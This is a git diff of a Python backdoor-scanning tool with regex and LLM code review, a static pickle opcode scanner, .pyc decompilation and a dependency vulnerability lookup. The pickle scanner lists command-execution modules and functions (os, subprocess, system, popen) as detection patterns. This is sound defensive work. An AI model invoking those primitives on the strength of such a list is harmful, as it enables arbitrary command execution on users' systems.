        text_output += "-" * len(f"{risk_level.capitalize()} Risk:") + "\n"
        for line_num, line in entries:
            text_output += f"  Line {line_num}: {line}\n"
        text_output += "\n"

    if file_name:
        with open(file_name, "w", encoding="utf-8") as file:
            file.write(text_output)
        return None
    else:
        return text_output
|
||||
|
||||
|
||||
def checkModeAndDetect(mode: str, filePath: str, fileExtension: str, pycdc_addr: str):
    """Dispatch one file to the detector selected by *mode*.

    .pyc files are disassembled first; on a failed disassembly the relevant
    module-level flag is cleared so main() can print a diagnostic afterwards.

    Args:
        mode: "llm" for the GPT detector; any other value uses the regex scan.
        filePath: file to analyze.
        fileExtension: the file's suffix, including the dot.
        pycdc_addr: path to the pycdc executable (only used for .pyc files).
    """

    def run_detection(source):
        # "llm" routes to GPT; "regex" and every other mode use the regex scan
        if mode == "llm":
            return detectGPT(source)
        return find_dangerous_functions(source, fileExtension)

    if fileExtension != ".pyc":
        return run_detection(read_file_content(filePath))

    # .pyc files must be disassembled before scanning
    file_content = disassemble_pyc(filePath, pycdc_addr)
    if file_content == "none":
        # pycdc unavailable for this bytecode version
        global PYCDC_FLAG
        PYCDC_FLAG = False
        return ""
    if file_content == "invalid":
        # bad pycdc path; flag it but still run detection on the sentinel,
        # matching the original control flow
        global PYCDC_ADDR_FLAG
        PYCDC_ADDR_FLAG = False
    return run_detection(file_content)
|
||||
|
||||
|
||||
def process_path(
    path: str,
    output_format: str,
    mode: str,
    pycdc_addr: str,
    output_file=None,
    requirement_path=None,
):
    """
    Walk *path* (file or directory), run the selected detector on every
    supported file, and emit the combined report via output_results().

    Args:
        path (str): file or directory to scan.
        output_format (str): "html", "md", "txt" or "pdf".
        mode (str): "regex" or "llm" (anything else falls back to regex).
        pycdc_addr (str): path to the pycdc executable for .pyc disassembly.
        output_file (Optional[str]): report destination; None prints to stdout.
        requirement_path (Optional[str]): optional requirements file to check.
    """
    results = {"high": [], "medium": [], "low": [], "none": [], "pickles": []}
    if os.path.isdir(path):
        # collect every supported file recursively
        all_files = [
            file_path
            for file_path in Path(path).rglob("*")
            if file_path.suffix in SUPPORTED_EXTENSIONS
        ]
        # NOTE(review): debug print of the whole file list -- consider removing
        print(all_files)
        if mode == "llm":
            # the LLM path scans all files concurrently in one batch
            results = GPTdetectFileList(all_files)
        else:
            # progress bar while scanning
            for file_path in tqdm(all_files, desc="Scanning files", unit="file"):
                file_extension = file_path.suffix
                if file_extension in [".pkl",".pickle"]:
                    # pickle files go through their dedicated detector
                    res = pickleDataDetection(str(file_path), output_file)
                    results["pickles"].append({"file": str(file_path), "result": res})
                    continue
                file_results = checkModeAndDetect(
                    mode, str(file_path), file_extension, pycdc_addr
                )
                if file_results is not None:
                    for key in file_results:
                        if key != "none":  # Exclude 'none' risk level
                            results[key].extend(
                                [
                                    # prefix each finding with its file path
                                    (f"{file_path}: Line {line_num}", line)
                                    for line_num, line in file_results[key]
                                ]
                            )
    elif os.path.isfile(path):
        file_extension = os.path.splitext(path)[1]
        if file_extension in [".pkl", ".pickle"]:
            res = pickleDataDetection(str(path), output_file)
            results["pickles"].append({"file": str(path), "result": res})
        elif file_extension in SUPPORTED_EXTENSIONS:
            file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr)
            if file_results is not None:
                for key in file_results:
                    if key != "none":  # Exclude 'none' risk level
                        results[key].extend(
                            [
                                (f"{path}: Line {line_num}", line)
                                for line_num, line in file_results[key]
                            ]
                        )
        else:
            print("Unsupported file type.")
            return
    else:
        print("Invalid path.")
        sys.exit(1)
    if requirement_path is not None:
        # optional supply-chain check of the requirements file
        requirement_detection(requirement_path, output_file)
    output_results(results, output_format, output_file)
|
||||
|
||||
|
||||
def main():
    """Command-line entry point: parse arguments, run the scan, report errors."""
    import argparse

    parser = argparse.ArgumentParser(
        description="Backdoor detection tool.", prog="detection"
    )
    parser.add_argument("path", help="Path to the code to analyze")
    parser.add_argument("-o", "--output", help="Output file path", default=None)
    parser.add_argument(
        "-m", "--mode", help="Mode of operation:[regex,llm]", default="regex"
    )
    # NOTE(review): defaulting the pycdc path to the PATH environment variable
    # looks unintentional -- confirm the intended default.
    parser.add_argument(
        "-p",
        "--pycdc",
        help="Path to pycdc.exe to decompile",
        default=os.getenv("PATH"),
    )
    # NOTE(review): args.Pickle is parsed but never read below -- dead option?
    parser.add_argument(
        "-P",
        "--Pickle",
        help="Path to pickle file to analyze",
        default=None,
    )
    parser.add_argument(
        "-r",
        "--requirement",
        help="Path to requirement file to analyze",
        default=None,
    )
    args = parser.parse_args()
    output_format = "txt"  # Default output format
    output_file = None
    if args.output:
        # derive the output format from the requested file extension
        _, ext = os.path.splitext(args.output)
        ext = ext.lower()
        if ext in [".html", ".md", ".txt", ".pdf"]:
            output_format = ext.replace(".", "")
            output_file = args.output
        else:
            # unknown extension: fall back to txt and rename the file
            print(
                "Your input file format was incorrect, the output has been saved as a TXT file."
            )
            output_file = args.output.rsplit(".", 1)[0] + ".txt"
    # if no output file was specified, the report goes to stdout
    process_path(
        args.path, output_format, args.mode, args.pycdc, output_file, args.requirement
    )
    # surface .pyc disassembly failures recorded via the module-level flags
    if PYCDC_FLAG == False:
        print(
            "ERROR: Detected Python 3.11 or above .pyc files. You need to install pycdc and compile it yourself to obtain pycdc."
        )
        print("Repo: https://github.com/zrax/pycdc.git")
    if PYCDC_ADDR_FLAG == False:
        print("ERROR: The specified pycdc.exe path is not valid")
        print("Please check your pycdc path.")
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
204
detection/backdoor_detection.py
Normal file
204
detection/backdoor_detection.py
Normal file
@@ -0,0 +1,204 @@
|
||||
import os
|
||||
from typing import Dict, List, Tuple
|
||||
from reportlab.lib.pagesizes import letter
|
||||
from reportlab.lib.styles import getSampleStyleSheet
|
||||
from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate
|
||||
|
||||
from detection.pickle_detection import pickleDataDetection
|
||||
from .Regexdetection import find_dangerous_functions
|
||||
from .GPTdetection import detectGPT
|
||||
from .utils import *
|
||||
import sys
|
||||
|
||||
SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp"}
|
||||
OUTPUT_FORMATS = ["html", "md", "txt", "pdf"]
|
||||
|
||||
|
||||
def generate_text_content(results):
    """Build the plain-text security report for *results*.

    Skips the "none" risk level and any level that has no findings.
    """
    chunks = ["Security Analysis Report\n"]
    for level, findings in results.items():
        if findings and level != "none":
            chunks.append(f"{level.capitalize()} Risk:\n")
            chunks.extend(f"  Line {num}: {text}\n" for num, text in findings)
    return "".join(chunks)
|
||||
|
||||
|
||||
def output_results(results, output_format, output_file=None):
    """Emit *results* in *output_format*; print to stdout when no file is given.

    Unknown formats fall back to txt and the output file name is rewritten
    with a .txt extension. The output directory is created if missing.
    """
    if output_file:
        if output_format not in OUTPUT_FORMATS:
            output_format = "txt"
            # BUG FIX: os.path.splitext returns a (root, ext) tuple; the
            # original interpolated the whole tuple, producing names like
            # "('report', '.xyz').txt". Use the root component only.
            output_file = os.path.splitext(output_file)[0] + ".txt"
        results_dir = os.path.dirname(output_file)
        # BUG FIX: for a bare filename dirname() is "" and os.makedirs("")
        # raises FileNotFoundError — only create a non-empty directory.
        if results_dir and not os.path.exists(results_dir):
            os.makedirs(results_dir)
        if output_format == "pdf":
            output_pdf(results, output_file)
        elif output_format == "html":
            output_html(results, output_file)
        elif output_format == "md":
            output_markdown(results, output_file)
        else:  # Default to txt
            output_text(results, output_file)
    else:
        # If no output file is specified, default to text output to the terminal.
        print(generate_text_content(results))
|
||||
|
||||
|
||||
def output_pdf(results: Dict[str, List[Tuple[int, str]]], file_name):
    """Render *results* as a PDF report written to *file_name*.

    Uses ReportLab platypus: a centered title followed by one Heading2
    section per non-"none" risk level with its findings as body text.
    """
    doc = SimpleDocTemplate(file_name, pagesize=letter)
    story = []
    styles = getSampleStyleSheet()

    # Add the title centered
    title_style = styles["Title"]
    title_style.alignment = 1  # Center alignment
    title = Paragraph("Security Analysis Report", title_style)
    story.append(title)
    story.append(Spacer(1, 20))  # Space after title

    # Add risk levels and entries
    normal_style = styles["BodyText"]
    for risk_level, entries in results.items():
        if risk_level != "none":
            story.append(
                Paragraph(f"{risk_level.capitalize()} Risk:", styles["Heading2"])
            )
            for line_num, line in entries:
                entry = Paragraph(f"Line {line_num}: {line}", normal_style)
                story.append(entry)
            story.append(Spacer(1, 12))  # Space between sections

    doc.build(story)
|
||||
|
||||
|
||||
def output_html(results: Dict[str, List[Tuple[int, str]]], file_name=None):
    """Render *results* as an HTML report; write to *file_name* or return it."""
    parts = [
        "<html><head><title>Security Analysis Report</title></head><body>",
        "<h1>Security Analysis Report</h1>",
    ]
    for level, findings in results.items():
        if level != "none":
            parts.append(f"<h2>{level.capitalize()} Risk</h2><ul>")
            parts.extend(f"<li>{num}: {text}</li>" for num, text in findings)
            parts.append("</ul>")
    parts.append("</body></html>")
    html_output = "".join(parts)
    if file_name:
        with open(file_name, "w") as file:
            file.write(html_output)
    else:
        return html_output
|
||||
|
||||
|
||||
def output_markdown(results: Dict[str, List[Tuple[int, str]]], file_name=None):
    """Render *results* as Markdown; write to *file_name* or return the text."""
    pieces = ["# Security Analysis Report\n"]
    for level, findings in results.items():
        if level != "none":
            pieces.append(f"## {level.capitalize()} Risk\n")
            pieces.extend(f"- {num}: {text}\n" for num, text in findings)
    md_output = "".join(pieces)
    if file_name:
        with open(file_name, "w") as file:
            file.write(md_output)
    else:
        return md_output
|
||||
|
||||
|
||||
def output_text(results: Dict[str, List[Tuple[int, str]]], file_name=None):
|
||||
text_output = "Security Analysis Report\n"
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
text_output += f"{risk_level.capitalize()} Risk:\n"
|
||||
for line_num, line in entries:
|
||||
text_output += f" {line_num}: {line}\n"
|
||||
if file_name:
|
||||
with open(file_name, "w") as file:
|
||||
file.write(text_output)
|
||||
else:
|
||||
return text_output
|
||||
|
||||
|
||||
def checkModeAndDetect(mode: str, filePath: str, fileExtension: str):
    """Dispatch detection of one file according to *mode*.

    "llm" routes to the GPT detector; any other value (including the
    default "regex") routes to the regex scanner.

    Returns the detector's risk-level dict.
    """
    # TODO: add more modes; this keeps the dispatch extensible.
    # FIX: the regex branch was duplicated in `if` and `else`, and the file
    # was read separately in each branch — read once and collapse.
    content = read_file_content(filePath)
    if mode == "llm":
        return detectGPT(content)
    return find_dangerous_functions(content, fileExtension)
|
||||
|
||||
|
||||
def process_path(path: str, output_format: str, mode: str, output_file=None):
    """Scan *path* (file or directory) for dangerous code and emit a report.

    Directories are walked recursively; only SUPPORTED_EXTENSIONS files are
    scanned. Exits with status 1 for an invalid path; prints a notice and
    returns early for an unsupported single-file extension.
    """
    results = {"high": [], "medium": [], "low": [], "none": []}

    def _merge(file_path: str, file_results) -> None:
        # Fold one file's findings into the aggregate, tagging each entry
        # with its origin file; the 'none' risk level is excluded.
        for key in file_results:
            if key != "none":
                results[key].extend(
                    (f"{file_path}: Line {line_num}", line)
                    for line_num, line in file_results[key]
                )

    if os.path.isdir(path):
        for root, dirs, files in os.walk(path):
            for file in files:
                file_extension = os.path.splitext(file)[1]
                if file_extension in SUPPORTED_EXTENSIONS:
                    file_path = os.path.join(root, file)
                    _merge(
                        file_path,
                        checkModeAndDetect(mode, file_path, file_extension),
                    )
    elif os.path.isfile(path):
        file_extension = os.path.splitext(path)[1]
        if file_extension in SUPPORTED_EXTENSIONS:
            _merge(path, checkModeAndDetect(mode, path, file_extension))
        else:
            print("Unsupported file type.")
            return
    else:
        print("Invalid path.")
        sys.exit(1)

    output_results(results, output_format, output_file)
|
||||
|
||||
|
||||
def main():
    """CLI entry point: parse arguments and run the requested detection."""
    import argparse

    parser = argparse.ArgumentParser(description="Backdoor detection tool.")
    parser.add_argument("path", help="Path to the code to analyze")
    parser.add_argument("-o", "--output", help="Output file path", default=None)
    parser.add_argument(
        "-m", "--mode", help="Mode of operation:[regex,llm]", default="regex"
    )
    parser.add_argument("-p", "--pickle", help="analyze the pickle file", default=None)
    args = parser.parse_args()

    # The report format follows the output file's extension; anything
    # unrecognised is rewritten to a .txt file.
    output_format = "txt"
    output_file = None
    if args.output:
        ext = os.path.splitext(args.output)[1].lower()
        if ext in [".html", ".md", ".txt", ".pdf"]:
            output_format = ext.replace(".", "")
            output_file = args.output
        else:
            print(
                "Your input file format was incorrect, the output has been saved as a TXT file."
            )
            output_file = args.output.rsplit(".", 1)[0] + ".txt"
    # Without an output file the report is printed to stdout.
    if args.pickle:
        pickleDataDetection(args.pickle, output_file)
    else:
        process_path(args.path, output_format, args.mode, output_file)


if __name__ == "__main__":
    main()
|
||||
149
detection/cngptdetection.py
Normal file
149
detection/cngptdetection.py
Normal file
@@ -0,0 +1,149 @@
|
||||
import os
|
||||
import threading
|
||||
import time
|
||||
|
||||
import requests
|
||||
import re
|
||||
import json
|
||||
from typing import List, Dict, Any
|
||||
|
||||
from detection.utils import read_file_content
|
||||
|
||||
|
||||
class TimeoutException(Exception):
    """Custom exception used to signal a timeout."""

    pass
|
||||
|
||||
|
||||
def detectGPT(content: str, token: str):
    """
    Detect potential security vulnerabilities in the given code content
    using Baidu's ERNIE chat API.

    Parameters:
    - content: the code string to analyze.
    - token: API access token (see get_access_token).

    Returns:
    - dict mapping risk level ("high"/"medium"/"low"/"none") to a list of
      (line_number, stripped_source_line) tuples.

    Raises:
    - ValueError on request failure or an empty API response.
    """

    url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + token

    # Prompt instructs the model to answer with a one-line JSON array of
    # {"Line": ..., "Risk": ..., "Reason": ...} objects; the code under
    # review is appended directly to the prompt text.
    payload = json.dumps({
        "messages": [
            {
                "role": "user",
                "content": (
                    "You are a Python code reviewer. Read the code below and identify any potential "
                    "security vulnerabilities. Classify them by risk level (high, medium, low, none). "
                    'Only report the line number and the risk level.\nYou should output the result as '
                    'json format in one line. For example: [{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnerable}"}] '
                    "Each of these three fields is required.\nYou are required to only output the json format. "
                    "Do not output any other information." + content
                )
            }
        ]
    })
    headers = {
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(url, headers=headers, data=payload)
        response.raise_for_status()
        res_json = response.json()
        message_content = res_json.get('result')
        if message_content is None:
            raise ValueError("API response content is None")
    except requests.RequestException as e:
        raise ValueError(f"Request failed: {str(e)}")

    extracted_data = extract_json_from_text(message_content)

    classified_results = {"high": [], "medium": [], "low": [], "none": []}
    for res in extracted_data:
        # Map each reported line number back to its source text; silently
        # skip malformed entries (bad line number, unknown risk level, or
        # out-of-range line index).
        try:
            line_number = int(res["Line"])
            classified_results[res["Risk"]].append(
                (line_number, content.split("\n")[line_number - 1].strip())
            )
        except (ValueError, IndexError, KeyError):
            continue

    return classified_results
|
||||
|
||||
|
||||
def get_access_token(api_key: str, secret_key: str) -> str:
    """
    Exchange the Baidu API key/secret pair for an OAuth access token.

    Returns:
    - the access_token string (None if absent from the response).
    """
    endpoint = "https://aip.baidubce.com/oauth/2.0/token"
    query = {
        "grant_type": "client_credentials",
        "client_id": api_key,
        "client_secret": secret_key,
    }
    resp = requests.post(endpoint, params=query)
    resp.raise_for_status()
    return resp.json().get("access_token")
|
||||
|
||||
|
||||
def extract_json_from_text(text: str) -> List[Dict[str, Any]]:
    """
    Extract the first JSON array of objects embedded in *text*.

    Returns the parsed list, or [] when no array is found or parsing fails.
    """
    found = re.search(r'\[\s*{.*?}\s*\]', text, re.DOTALL)
    if found is None:
        print("未找到 JSON 数据")
        return []

    candidate = found.group(0)
    try:
        return json.loads(candidate)
    except json.JSONDecodeError as e:
        print(f"解码 JSON 时出错: {e}")
        return []
|
||||
|
||||
|
||||
def GPTdetectFileList(fileList):
    """Run the GPT detector over every file in *fileList* concurrently.

    Spawns one thread per file; all threads merge their findings into a
    single shared risk-level dict.

    Raises ValueError when BAIDU_API_KEY/BAIDU_SECRET_KEY are not set in
    the environment.
    """
    api_key = os.getenv("BAIDU_API_KEY")
    secret_key = os.getenv("BAIDU_SECRET_KEY")
    if not api_key or not secret_key:
        raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
    results = {"high": [], "medium": [], "low": [], "none": []}
    threads = []
    token = get_access_token(api_key, secret_key)
    for file in fileList:
        content = read_file_content(str(file))
        threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results,token)))
    for thread in threads:
        thread.start()
        # Stagger thread start-up to avoid hammering the rate-limited API.
        time.sleep(0.5)
    for thread in threads:
        thread.join()
    return results
|
||||
|
||||
|
||||
def GPTThread(filename, content, results, token):
    """Worker thread: run detectGPT on *content* and merge into *results*.

    *results* is shared across threads; list.extend on its per-level lists
    is effectively atomic under the GIL.
    """
    res = detectGPT(content, token)
    for key in res:
        if key != "none":  # Exclude 'none' risk level
            # BUG FIX: tag each entry with the actual file it came from —
            # the original hard-coded "(unknown)" and never used *filename*.
            results[key].extend(
                [
                    (f"{filename}: Line {line_num}", line)
                    for line_num, line in res[key]
                ]
            )
|
||||
149
detection/pickle_detection.py
Normal file
149
detection/pickle_detection.py
Normal file
@@ -0,0 +1,149 @@
|
||||
import io
|
||||
import json
|
||||
import pickle
|
||||
|
||||
|
||||
class _Unframer:
    """Framed-stream reader mirroring CPython's private pickle._Unframer.

    Serves reads from the current pickle protocol-4 frame buffer when one
    is active, otherwise reads straight from the underlying file.
    """

    def __init__(self, file_read, file_readline, file_tell=None):
        # file_tell is accepted for signature compatibility but unused.
        self.file_read = file_read
        self.file_readline = file_readline
        self.current_frame = None  # io.BytesIO of the active frame, or None

    def readinto(self, buf):
        """Fill *buf* from the frame (or file); return the number of bytes."""
        if self.current_frame:
            n = self.current_frame.readinto(buf)
            if n == 0 and len(buf) != 0:
                # Frame exhausted exactly at a boundary: drop it and read
                # the request directly from the file.
                self.current_frame = None
                n = len(buf)
                buf[:] = self.file_read(n)
                return n
            if n < len(buf):
                # A read may not straddle the end of a frame.
                raise pickle.UnpicklingError("pickle exhausted before end of frame")
            return n
        else:
            n = len(buf)
            buf[:] = self.file_read(n)
            return n

    def read(self, n):
        """Read *n* bytes from the frame (or file)."""
        if self.current_frame:
            data = self.current_frame.read(n)
            if not data and n != 0:
                # Frame exhausted: fall back to the raw file.
                self.current_frame = None
                return self.file_read(n)
            if len(data) < n:
                raise pickle.UnpicklingError("pickle exhausted before end of frame")
            return data
        else:
            return self.file_read(n)

    def readline(self):
        """Read one newline-terminated line; lines may not span frames."""
        if self.current_frame:
            data = self.current_frame.readline()
            if not data:
                self.current_frame = None
                return self.file_readline()
            if data[-1] != b"\n"[0]:
                raise pickle.UnpicklingError("pickle exhausted before end of frame")
            return data
        else:
            return self.file_readline()

    def load_frame(self, frame_size):
        """Begin a new frame of *frame_size* bytes read from the file."""
        if self.current_frame and self.current_frame.read() != b"":
            raise pickle.UnpicklingError(
                "beginning of a new frame before end of current frame"
            )
        self.current_frame = io.BytesIO(self.file_read(frame_size))
|
||||
|
||||
|
||||
# Modules whose appearance in a pickle GLOBAL opcode is treated as suspicious.
dangerous_modules = ["os", "subprocess", "builtins", "nt"]
# Callable names commonly used to execute commands from a pickle payload.
dangerous_names = [
    "system",
    "popen",
    "run",
    "call",
    "check_output",
    "check_call",
]
|
||||
|
||||
|
||||
class pickleScanner:
    """Static pickle scanner: walks the opcode stream without unpickling.

    Counts REDUCE opcodes and records GLOBAL references to dangerous
    modules/callables; never constructs any object from the stream.
    """

    def __init__(
        self, file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None
    ):
        # Mirrors pickle._Unpickler's constructor; several fields are kept
        # only for signature compatibility and are unused by the scanner.
        self._buffers = iter(buffers) if buffers is not None else None
        self._file_readline = file.readline
        self._file_read = file.read
        self.memo = {}
        self.encoding = encoding
        self.errors = errors
        self.proto = 0
        self.fix_imports = fix_imports
        self.file = file
        self.ReduceCount = 0  # number of REDUCE opcodes seen
        self.maliciousModule = []  # (module, name) pairs flagged as dangerous

    def find_class(self, module, name):
        # Record the (module, name) pair when either side is on a danger list.
        if module.decode() in dangerous_modules or name.decode() in dangerous_names:
            self.maliciousModule.append((module.decode(), name.decode()))

    def load(self):
        """Scan every opcode in the stream, recording REDUCE/GLOBAL usage."""
        self._unframer = _Unframer(self._file_read, self._file_readline)
        self.read = self._unframer.read
        self.readinto = self._unframer.readinto
        self.readline = self._unframer.readline
        self.seek = self.file.seek
        self.metastack = []
        self.stack = []
        self.append = self.stack.append
        self.proto = 0
        # Scan all opcodes.
        opcode = self.read(1)
        while opcode:
            if opcode == b"c":
                # 0x63 may be a GLOBAL opcode or a literal byte inside data;
                # peek at the preceding byte to decide (heuristic: a letter
                # or NUL before it suggests it is data, not an opcode).
                self.seek(-2, 1)
                codeN1 = self.read(1)
                if (
                    65 <= ord(codeN1) <= 90
                    or 97 <= ord(codeN1) <= 122
                    or ord(codeN1) == 0
                ):
                    self.read(1)
                else:
                    self.read(1)
                    # GLOBAL: two newline-terminated lines (module, name).
                    module = self.readline()[:-1]
                    name = self.readline()[:-1]
                    self.find_class(module, name)
            elif opcode in self.unsafe_opcodes:
                self.ReduceCount += 1
            opcode = self.read(1)

    # Opcodes that invoke a callable during unpickling. NOTE: defined after
    # load() in the class body; resolved at runtime via attribute lookup.
    unsafe_opcodes = {
        b"r",  # REDUCE - call a callable with arguments
        b"R",  # REDUCE - same as 'r', but for args tuple
    }

    def output(self) -> dict:
        """Return the scan summary (REDUCE count and flagged imports)."""
        return {
            "ReduceCount": self.ReduceCount,
            "maliciousModule": self.maliciousModule,
        }
|
||||
|
||||
|
||||
def pickleDataDetection(filename: str, output_file=None):
    """
    Statically scan a pickle file for dangerous constructs.

    :param filename: pickle file path
    :param output_file: accepted for interface compatibility; unused here.
    :return: dict with the REDUCE count and flagged module references.
    """
    with open(filename, "rb") as fh:
        scanner = pickleScanner(fh)
        scanner.load()
        report = scanner.output()
    return report


if __name__ == "__main__":
    pickleDataDetection("test.pkl")
|
||||
44
detection/pyc_detection.py
Normal file
44
detection/pyc_detection.py
Normal file
@@ -0,0 +1,44 @@
|
||||
from typing import List, Tuple
|
||||
import io
|
||||
import os
|
||||
import subprocess
|
||||
from contextlib import redirect_stdout, redirect_stderr
|
||||
|
||||
|
||||
def run_pycdc(exe_path: str, pyc_file: str) -> str:
    """
    Executes pycdc with the given .pyc file and captures the output.

    Args:
        exe_path (str): Path to the pycdc executable.
        pyc_file (str): Path to the .pyc file to decompile.

    Returns:
        str: stdout from pycdc, or "invalid" when *exe_path* is not a file.
    """
    if not os.path.isfile(exe_path):
        return "invalid"

    # SECURITY FIX: pass an argument list with the default shell=False
    # instead of interpolating paths into a shell string — file names
    # containing quotes or shell metacharacters can no longer inject
    # commands, and no quoting is needed.
    result = subprocess.run(
        [exe_path, pyc_file], capture_output=True, text=True, encoding="utf-8"
    )

    return result.stdout
|
||||
|
||||
|
||||
def disassemble_pyc(file_path: str, pycdc_addr=None) -> str:
    """
    Decompile a .pyc file using an external pycdc binary.

    Args:
        file_path (str): The path to the .pyc file.
        pycdc_addr: Path to the pycdc executable, or None when unavailable.

    Returns:
        str: Decompiled source from pycdc, "invalid" for a bad pycdc path,
        or "none" when no pycdc executable was supplied.
    """
    # FIX: removed a dead `io.StringIO()` buffer that was created and never
    # used (leftover from an earlier uncompyle6-based implementation).
    if pycdc_addr is None:
        return "none"
    return run_pycdc(pycdc_addr, file_path)
|
||||
268
detection/requirements_detection.py
Normal file
268
detection/requirements_detection.py
Normal file
@@ -0,0 +1,268 @@
|
||||
import argparse
|
||||
import requests
|
||||
from bs4 import BeautifulSoup
|
||||
from packaging.version import Version, InvalidVersion
|
||||
import sys
|
||||
from reportlab.lib.pagesizes import letter
|
||||
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
|
||||
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
|
||||
from colorama import Fore, Style, init
|
||||
from tqdm import tqdm
|
||||
import html
|
||||
import os
|
||||
|
||||
|
||||
init(autoreset=True) # 初始化colorama,并在每次打印后自动重置颜色
|
||||
|
||||
|
||||
def fetch_html(url: str) -> str:
    """Download *url* and return the body; return "" on any request error."""
    try:
        resp = requests.get(url)
        resp.raise_for_status()
    except requests.RequestException as e:
        print(f"Error fetching {url}: {e}")
        return ""
    return resp.text
|
||||
|
||||
|
||||
def parse_html(html: str) -> list:
    """Extract advisory rows from a Snyk package page.

    Returns a list of {"link": advisory title, "chip": affected-version
    range} dicts; [] when the results table is absent.
    """
    soup = BeautifulSoup(html, "html.parser")
    table = soup.find("table", id="sortable-table")
    if table is None:
        return []

    extracted = []
    for row in table.find_all("tr", class_="vue--table__row"):
        anchor = row.find("a")
        chip = row.find("span", class_="vue--chip__value")
        if anchor and chip:
            extracted.append(
                {
                    "link": anchor.get_text(strip=True),
                    "chip": chip.get_text(strip=True),
                }
            )
    return extracted
|
||||
|
||||
|
||||
def load_requirements(file_path: str) -> list:
    """Read non-empty, non-comment lines from a requirements file.

    Exits with status 1 when the file does not exist.
    """
    try:
        with open(file_path, "r") as fh:
            stripped = [raw.strip() for raw in fh]
    except FileNotFoundError:
        print(f"Error: File {file_path} not found.")
        sys.exit(1)
    return [entry for entry in stripped if entry and not entry.startswith("#")]
|
||||
|
||||
|
||||
def version_in_range(version, range_str: str) -> bool:
    """Return True when *version* lies inside Snyk's interval *range_str*.

    *range_str* uses notation like "[1.0,2.0)": '[' means inclusive lower
    bound, ')' exclusive upper bound; an empty bound (e.g. "[,)") matches
    all versions. An unpinned requirement (version is None) is treated as
    affected. Unparseable versions/bounds return False.
    """
    if version is None:
        # BUG FIX: the original returned True only when range_str[-2] == ","
        # and otherwise fell through to code referencing the still-undefined
        # local `v`, raising NameError. Conservatively flag every unpinned
        # requirement as potentially affected.
        return True
    try:
        v = Version(version)
    except InvalidVersion:
        return False

    for range_part in range_str.split(","):
        range_part = range_part.strip()
        # BUG FIX: the original stripped "[]()" from each part *before*
        # testing startswith("[")/endswith(")"), so both bound checks were
        # dead code and every valid version was reported as vulnerable.
        bound = range_part.strip("[]()")
        if not bound:
            continue  # empty bound, e.g. the "[,)" (all versions) form
        try:
            if range_part.endswith(")"):
                # Exclusive upper bound.
                if v >= Version(bound):
                    return False
            elif range_part.startswith("["):
                # Inclusive lower bound.
                if v < Version(bound):
                    return False
        except InvalidVersion:
            return False
    return True
|
||||
|
||||
|
||||
def check_vulnerabilities(requirements: list, base_url: str) -> str:
    """Query *base_url* for each requirement and collect matching advisories.

    Returns a newline-joined report string; packages without relevant
    vulnerabilities are omitted entirely.
    """
    results = []
    for req in tqdm(requirements, desc="Checking vulnerabilities", unit="dependency"):
        version = ""
        # "pkg==1.2" pins a version; any other spec is treated as unpinned.
        if "==" in req:
            package_name, version = req.split("==")
        else:
            package_name, version = req, None
        url = f"{base_url}{package_name}"
        html_content = fetch_html(url)
        if html_content:
            extracted_data = parse_html(html_content)
            if extracted_data:
                relevant_vulns = []
                for vuln in extracted_data:
                    # Keep only advisories whose affected range ("chip")
                    # covers the pinned version.
                    if version_in_range(version, vuln["chip"]):
                        relevant_vulns.append(vuln)
                if relevant_vulns:
                    result = f"Vulnerabilities found for {package_name}:\n"
                    for vuln in relevant_vulns:
                        result += f"  - {vuln['link']}\n"
                    results.append(result)
    return "\n".join(results)
|
||||
|
||||
|
||||
def save_to_file(output_path: str, data: str):
    """Dispatch report saving on the output file's extension (default: txt)."""
    for suffix, writer in (
        (".html", save_as_html),
        (".pdf", save_as_pdf),
        (".md", save_as_markdown),
    ):
        if output_path.endswith(suffix):
            writer(output_path, data)
            return
    save_as_txt(output_path, data)
|
||||
|
||||
|
||||
def save_as_html(output_path: str, data: str):
    """Write *data* into a styled, standalone HTML report at *output_path*.

    The report text is HTML-escaped and placed in a <pre> block inside a
    fixed page template; doubled braces are literal CSS braces inside the
    f-string.
    """
    escaped_data = html.escape(data)
    html_content = f"""
    <html>
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="icon" href="https://s2.loli.net/2024/05/30/WDc6MekjbuCU9Qo.png">
        <title>Vulnerability Report</title>
        <style>
            body {{
                font-family: Arial, sans-serif;
                background-image: url('https://s2.loli.net/2024/05/30/85Mv7leB2IRWNp6.jpg');
                background-size: cover;
                color: #333;
                margin: 0;
                padding: 0;
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
            }}
            .container {{
                background: rgba(255, 255, 255, 0.8);
                border-radius: 10px;
                padding: 20px;
                box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
                max-width: 800px;
                width: 100%;
                margin: 20px;
                overflow-y: auto;
                max-height: 90vh;
            }}
            .title {{
                font-size: 24px;
                font-weight: bold;
                text-align: center;
                margin-bottom: 20px;
            }}
            pre {{
                white-space: pre-wrap;
                word-wrap: break-word;
                font-size: 14px;
                line-height: 1.5;
                color: #333;
                background: #f4f4f4;
                padding: 10px;
                border-radius: 5px;
                border: 1px solid #ddd;
                overflow: auto;
                font-weight: bold;
            }}
        </style>
    </head>
    <body>
        <div class="container">
            <div class="title">Vulnerability Report</div>
            <pre>{escaped_data}</pre>
        </div>
    </body>
    </html>
    """
    with open(output_path, "w", encoding="utf-8") as file:
        file.write(html_content)
|
||||
|
||||
|
||||
def save_as_pdf(output_path: str, data: str):
    """Render *data* as a PDF vulnerability report via ReportLab platypus."""
    doc = SimpleDocTemplate(output_path, pagesize=letter)
    story = []
    styles = getSampleStyleSheet()

    # Add the title centered
    title_style = ParagraphStyle(
        "Title",
        parent=styles["Title"],
        alignment=1,  # Center alignment
        fontSize=24,
        leading=28,
        spaceAfter=20,
        fontName="Helvetica-Bold",
    )
